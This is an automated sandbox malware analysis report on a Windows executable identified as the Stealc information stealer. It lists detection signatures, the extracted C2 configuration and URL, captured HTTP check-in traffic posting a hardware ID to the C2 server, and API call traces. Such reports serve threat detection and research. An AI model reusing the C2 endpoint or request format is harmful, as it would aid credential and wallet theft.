Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561772
MD5: cb78b3cf97d74f0540679225a564e8b0
SHA1: 95b72e4eb9f28a6534e1d902f802f2988ad6735f
SHA256: 3427282a0e679abf14880c48f47728c97e1c3f870d1bf3bc0116736f3abde675
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CB78B3CF97D74F0540679225A564E8B0)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1739579028.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7516 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7516 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T09:25:06.783371+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpUN | Avira URL Cloud: Label: malware
Source: file.exe.7516.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002BEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B9B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------KFHJJJKKFHIDAAKFBFBF
    Content-Disposition: form-data; name="hwid"

    D7A69E9F98841340093196
    ------KFHJJJKKFHIDAAKFBFBF
    Content-Disposition: form-data; name="build"

    mars
    ------KFHJJJKKFHIDAAKFBFBF--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------KFHJJJKKFHIDAAKFBFBF
    Content-Disposition: form-data; name="hwid"

    D7A69E9F98841340093196
    ------KFHJJJKKFHIDAAKFBFBF
    Content-Disposition: form-data; name="build"

    mars
    ------KFHJJJKKFHIDAAKFBFBF--
Source: file.exe, 00000000.00000002.1780359810.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/3
Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/J
Source: file.exe, 00000000.00000002.1780359810.00000000011F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-
Source: file.exe, 00000000.00000002.1780359810.0000000001206000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1780359810.0000000001223000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpQ
Source: file.exe, 00000000.00000002.1780359810.00000000011F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUN
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002B9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C885F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055510D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066E13A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00664102
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065BA5A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C2AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B8B78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065A3FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065F401
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065D4F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00662542
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066954B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073EE46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0063FEC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067174A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006677BD
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 002B4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: hnbmjddz ZLIB complexity 0.9948681414219475
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002CCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\O9NEX20H.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1762304 > 1048576
Source: file.exe | Static PE information: Raw size of hnbmjddz is bigger than: 0x100000 < 0x194600

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hnbmjddz:EW;fhrijgtr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hnbmjddz:EW;fhrijgtr:EW;.taggant:EW;
